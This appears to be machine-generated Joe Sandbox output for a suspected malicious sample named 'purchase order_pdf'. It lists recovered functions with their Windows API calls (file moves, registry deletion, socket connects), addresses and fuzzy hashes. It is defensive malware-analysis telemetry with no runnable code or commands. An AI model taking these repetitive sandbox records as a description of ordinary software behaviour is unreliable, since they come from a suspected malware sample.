Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d5d33d04fd6ac70f9c23d407a8d33def886f3650a7a54786a8a1fb8c94d9de16
Instruction ID: bc026f806d618aa662b6274760a7cbebf722e79ea393d8034936b46f588889d5
Opcode Fuzzy Hash: d5d33d04fd6ac70f9c23d407a8d33def886f3650a7a54786a8a1fb8c94d9de16
Instruction Fuzzy Hash: 935104A05042D53DFF3683248C49B7ABFAAFF06300F08868AE1D4C6AC2D799AC94D751

Function 008D589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 008D58AC
_wcsncpy.LIBCMT ref: 008D58E1
_wcsncpy.LIBCMT ref: 008D5913
_wcsncpy.LIBCMT ref: 008D5946
_wcsncpy.LIBCMT ref: 008D5988
_wcsncpy.LIBCMT ref: 008D59C2
_wcsncpy.LIBCMT ref: 008D59F1

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 0f8d1a2bcff5da167024e4059805b3cd4f0a561257a7653df06be12851850a9a
Instruction ID: 4ec34557336b6b4246150ac1d55c33fa0ff7ff54081190bc403bb24dd2431d3e
Opcode Fuzzy Hash: 0f8d1a2bcff5da167024e4059805b3cd4f0a561257a7653df06be12851850a9a
Instruction Fuzzy Hash: 07416D65C2062876CF10FBF88C869CFB7A8FF04710F549567E518E3222E634E615C7AA

Function 008D38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008D48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008D38D3,?), ref: 008D48C7

Part of subcall function 008D48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008D38D3,?), ref: 008D48E0

lstrcmpiW.KERNEL32(?,?), ref: 008D38F3
_wcscmp.LIBCMT ref: 008D390F
MoveFileW.KERNEL32(?,?), ref: 008D3927
_wcscat.LIBCMT ref: 008D396F
SHFileOperationW.SHELL32(?), ref: 008D39DB

Strings

\*.*, xrefs: 008D3969

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 0f2b892d52430561b30bf3af04bca10142b375dd14aca0eec96169b0ab22ca60
Instruction ID: 44e0aae7716e6be882d37d3a3208899042630d712fba311928c9126cc6f9f9cb
Opcode Fuzzy Hash: 0f2b892d52430561b30bf3af04bca10142b375dd14aca0eec96169b0ab22ca60
Instruction Fuzzy Hash: 4C416DB2409344AAC751EF68C4919EFB7E8FF89340F041A2FB489C3251EA75D648C753

Function 008F7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008F7519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008F75C0
IsMenu.USER32(?), ref: 008F75D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008F7620
DrawMenuBar.USER32 ref: 008F7633

Strings

0, xrefs: 008F750D

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: df07eaac5a374876d4d54f4f42ac64002fb3822ede23e76d813eb8cd1ef1b751
Instruction ID: f73d3df157ab7bedbd623eb3cfe41c69959361f55921e5dc212822cd7d4df99b
Opcode Fuzzy Hash: df07eaac5a374876d4d54f4f42ac64002fb3822ede23e76d813eb8cd1ef1b751
Instruction Fuzzy Hash: 1C411575A04609AFEB20DFA4D884EAABBF8FF18314F048129EA15D7350D734AD50CFA0

Function 008F122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 008F125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008F1286
FreeLibrary.KERNEL32(00000000), ref: 008F133D

Part of subcall function 008F122D: RegCloseKey.ADVAPI32(?), ref: 008F12A3
Part of subcall function 008F122D: FreeLibrary.KERNEL32(?), ref: 008F12F5
Part of subcall function 008F122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 008F1318

RegDeleteKeyW.ADVAPI32(?,?), ref: 008F12E0

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: a85890ace2074fd1cc5e52cd0af341ba0d8e71d20ae11e752eb354cef5409d5f
Instruction ID: 8bba23405f2132b88f04e5c9b0c31091d71c3c664f8848697021e6968ec7a04d
Opcode Fuzzy Hash: a85890ace2074fd1cc5e52cd0af341ba0d8e71d20ae11e752eb354cef5409d5f
Instruction Fuzzy Hash: CE31E7B190111DFFDF15DBA4D889EFEB7BCFF08300F000169A611E2251EB749E859AA4

Function 008F653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008F655B
GetWindowLongW.USER32(01226E10,000000F0), ref: 008F658E
GetWindowLongW.USER32(01226E10,000000F0), ref: 008F65C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008F65F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008F661F
GetWindowLongW.USER32(00000000,000000F0), ref: 008F6630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008F664A

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: e276e4fb5c659741cedc1857e557295b91e34d5b8bb8e9aab126494cd727c3a8
Instruction ID: 3c164127ec538527f86b9254e8e5c5cc4c1a95b582eca5eb9e984d5f47a50822
Opcode Fuzzy Hash: e276e4fb5c659741cedc1857e557295b91e34d5b8bb8e9aab126494cd727c3a8
Instruction Fuzzy Hash: 43310331608118AFDB208F28DC85F6537E1FB5E310F184268F601DB2B6DB61AC50DB51

Function 008E6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 008E80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008E80CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008E64D9
WSAGetLastError.WSOCK32(00000000), ref: 008E64E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 008E6521
connect.WSOCK32(00000000,?,00000010), ref: 008E652A
WSAGetLastError.WSOCK32 ref: 008E6534
closesocket.WSOCK32(00000000), ref: 008E655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 008E6576

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 55ce6cfd9b0a78b6537e2404d8ff34808df91c3595800f0d48bd7dff769de65c
Instruction ID: a769c2a5950e5c728c28fec56d11e61b93402771f365f3e275c1c4722ffac355
Opcode Fuzzy Hash: 55ce6cfd9b0a78b6537e2404d8ff34808df91c3595800f0d48bd7dff769de65c
Instruction Fuzzy Hash: 6831A171600118ABDB10AF25CC85FBE7BB8FF557A4F008069FA49D7291DB70AD54CB62

Function 008CE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008CE0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008CE120
SysAllocString.OLEAUT32(00000000), ref: 008CE123
SysAllocString.OLEAUT32 ref: 008CE144
SysFreeString.OLEAUT32 ref: 008CE14D
StringFromGUID2.OLE32(?,?,00000028), ref: 008CE167
SysAllocString.OLEAUT32(?), ref: 008CE175

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 94c0cb925ae698b9bd77e638c27a0ba33bdd5dd7603e95311c4d2c12bfee48f9
Instruction ID: 7353b9c39ce750db7fbe883a4d88d0a939b0dfebb6ff639f9b5f379e7e575256
Opcode Fuzzy Hash: 94c0cb925ae698b9bd77e638c27a0ba33bdd5dd7603e95311c4d2c12bfee48f9
Instruction Fuzzy Hash: 8D213136604108AF9B10AFB8DC88DBB77ECFF09760B14812AFA55CB261DA70DC41CB64

Function 008F783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00871D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00871D73
Part of subcall function 00871D35: GetStockObject.GDI32(00000011), ref: 00871D87
Part of subcall function 00871D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00871D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008F78A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008F78AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008F78B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008F78C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008F78D4

Strings

Msctls_Progress32, xrefs: 008F7872

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: ace92fc8f666d485264952b2afeba8e5e8709d173d6405870bd008e1e05aaba8
Instruction ID: be92e48ab19ea9697e27f1fd3686dcade169d7f7ecdcdbd64702075d3347df1e
Opcode Fuzzy Hash: ace92fc8f666d485264952b2afeba8e5e8709d173d6405870bd008e1e05aaba8
Instruction Fuzzy Hash: 6E117CB211021DBEEF159E64CC85EE77F6DEF48798F014124BB08A2090CA729C21DBA4

Function 008941C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00894292,?), ref: 008941E3
GetProcAddress.KERNEL32(00000000), ref: 008941EA
EncodePointer.KERNEL32(00000000), ref: 008941F6
DecodePointer.KERNEL32(00000001,00894292,?), ref: 00894213

Strings

combase.dll, xrefs: 008941DE
RoInitialize, xrefs: 008941D2

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 5f3d33c6d58e381b060367246b7587beafb241bcbbd905d8bf87404606f6390a
Instruction ID: 1a2eb57a60ab44160b78cc838203364a93cf5c840ee386885154fdc8026cf726
Opcode Fuzzy Hash: 5f3d33c6d58e381b060367246b7587beafb241bcbbd905d8bf87404606f6390a
Instruction Fuzzy Hash: FBE01AB06A8740AEEF206BF0EC4DF243AA5FB62706F124424B611D51F1DBF55491EF00

Function 0089429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008941B8), ref: 008942B8
GetProcAddress.KERNEL32(00000000), ref: 008942BF
EncodePointer.KERNEL32(00000000), ref: 008942CA
DecodePointer.KERNEL32(008941B8), ref: 008942E5

Strings

combase.dll, xrefs: 008942B3
RoUninitialize, xrefs: 008942A7

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: a7488aafc6e4f48325b8563c94a7f1438c4425d9cc3c5e7671a5e9c0731cf349
Instruction ID: c2277d3af79517803defa1c011b1444991c064b5ccfe146e14bfddfa3d36a359
Opcode Fuzzy Hash: a7488aafc6e4f48325b8563c94a7f1438c4425d9cc3c5e7671a5e9c0731cf349
Instruction Fuzzy Hash: AAE0B6785A9701EFEB10ABB0EC0DF153AA4BB24746F164038F201E51E1CBB55980EF14

Function 008D675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 008D68AD
_memmove.LIBCMT ref: 008D67E8

Part of subcall function 00879997: __itow.LIBCMT ref: 008799C2
Part of subcall function 00879997: __swprintf.LIBCMT ref: 00879A0C

_memmove.LIBCMT ref: 008D685B
_memmove.LIBCMT ref: 008D6942
_memmove.LIBCMT ref: 008D695B
_memmove.LIBCMT ref: 008D6977

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 3af6d411e28b57d511676d0be1257e081e6632898012fbce85b1e9ca118c072f
Instruction ID: 5e938ce81c80d807221c591de3f82c81e167755bc53fae64e423a6e5de0e1a37
Opcode Fuzzy Hash: 3af6d411e28b57d511676d0be1257e081e6632898012fbce85b1e9ca118c072f
Instruction Fuzzy Hash: 8961C03050465EABDF01EF28C881EFE3BA4FF44318F04865AF9599B296EB31D911CB52

Function 008F046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00877F41: _memmove.LIBCMT ref: 00877F82

Part of subcall function 008F10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008F0038,?,?), ref: 008F10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008F0548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008F0588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 008F05AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008F05D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 008F0617
RegCloseKey.ADVAPI32(00000000), ref: 008F0624

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: fa48c1068d3da64165d76a0291fa2b7653019fe4387acddec20be3ef8deb47bc
Instruction ID: a283c00185676126afaaa643df729d6cc5173610fc8ca6fa9dfe28b94ddd7944
Opcode Fuzzy Hash: fa48c1068d3da64165d76a0291fa2b7653019fe4387acddec20be3ef8deb47bc
Instruction Fuzzy Hash: 46514D315083049FCB14EB28C885E6ABBE8FF89354F04892DF655D72A2DB71E904CF52

Function 008F5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 008F5A82
GetMenuItemCount.USER32(00000000), ref: 008F5AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008F5AE1
GetMenuItemID.USER32(?,?), ref: 008F5B50
GetSubMenu.USER32(?,?), ref: 008F5B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 008F5BAF

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 13f0f14e650e9f0cc81caa51bbf2c2fd0e81f011058fef28ca2b06d2b9aa4a0d
Instruction ID: 3a3e817b564a9764dc0e87a4bc00cba7d0b5db0073b42c6f4bdf5490c9b5a5d0
Opcode Fuzzy Hash: 13f0f14e650e9f0cc81caa51bbf2c2fd0e81f011058fef28ca2b06d2b9aa4a0d
Instruction Fuzzy Hash: FB515C31A00629AFCF11EF68C845ABEBBB5FF48320F144469EA55E7351CB70AE41CB91

Function 008CF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008CF3F7
VariantClear.OLEAUT32(00000013), ref: 008CF469
VariantClear.OLEAUT32(00000000), ref: 008CF4C4
_memmove.LIBCMT ref: 008CF4EE
VariantClear.OLEAUT32(?), ref: 008CF53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 008CF569

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 9c60a133001bd75ea7e426cf21e1c92f7f64ebc396638853590a51c230308541
Instruction ID: f08c95ef1b1fc469fc4d98961c8b5eb8264a9b02f01d69fe98e6fd4c027de2ad
Opcode Fuzzy Hash: 9c60a133001bd75ea7e426cf21e1c92f7f64ebc396638853590a51c230308541
Instruction Fuzzy Hash: 3A5169B5A00209EFDB14CF58D884EAAB7B9FF4C314B15856AEE59DB301D730E911CBA0

Function 008D26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008D2747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008D2792
IsMenu.USER32(00000000), ref: 008D27B2
CreatePopupMenu.USER32 ref: 008D27E6
GetMenuItemCount.USER32(000000FF), ref: 008D2844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 008D2875

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 259bb5fc76525f78c6e9728ef436b9bff7ed80196f187c4265fd3d44b853f291
Instruction ID: 8bc3b1d7a4fa5473bd1a0235e6a8ba59af914d98a82ed7433346faab395ec260
Opcode Fuzzy Hash: 259bb5fc76525f78c6e9728ef436b9bff7ed80196f187c4265fd3d44b853f291
Instruction Fuzzy Hash: DE519E70A00249EBDF25CF68D888AAEBBF5FF64314F10436AE821DB391D7719944DB61

Function 00871765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00872612: GetWindowLongW.USER32(?,000000EB), ref: 00872623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0087179A
GetWindowRect.USER32(?,?), ref: 008717FE
ScreenToClient.USER32(?,?), ref: 0087181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0087182C
EndPaint.USER32(?,?), ref: 00871876

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
